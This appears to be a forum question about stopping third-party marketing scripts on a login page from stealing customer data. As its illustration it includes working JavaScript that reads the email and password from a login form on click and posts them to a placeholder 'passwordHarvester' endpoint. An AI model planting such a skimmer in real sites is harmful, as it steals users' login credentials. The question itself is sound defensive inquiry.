If the following JavaScript code was added into the stackoverflow.com login page then each time a browser clicked login, the form data entered would be sent off a third party website via a post request. I think this may be common on a lot of other websites as well. With the modern proliferation of “marketing tools” like Google Tag Manager, for example, how can website owners make sure small script snippets like the one below are not secretly harvesting customer data? Can websites do anything to encrypt the password entered within the form box?
The only thing I can think of is requiring a thorough review of tracking code that the marketing department wants to implement. Can someone please help me understand if a more elegant solution exists?
const elementToTrack = document.querySelector('#submit-button');
elementToTrack.addEventListener('click', () => {
getPW();
});
function getPW() {
var data = new FormData( document.getElementById('login-form') );
data = data.entries();
var obj = data.next();
var retrieved = {};
while(undefined !== obj.value) {
retrieved[obj.value[0]] = obj.value[1];
obj = data.next();
}
let pw = retrieved.password;
let email = retrieved.email;
/*just using a placeholder url for illustrative purposes */
fetch("https://somerandomserver.com/api/passwordHarvester", {
method: "POST",
body: JSON.stringify({
email: email,
password: pw
}),
headers: {
"Content-type": "application/json; charset=UTF-8"
}
});
}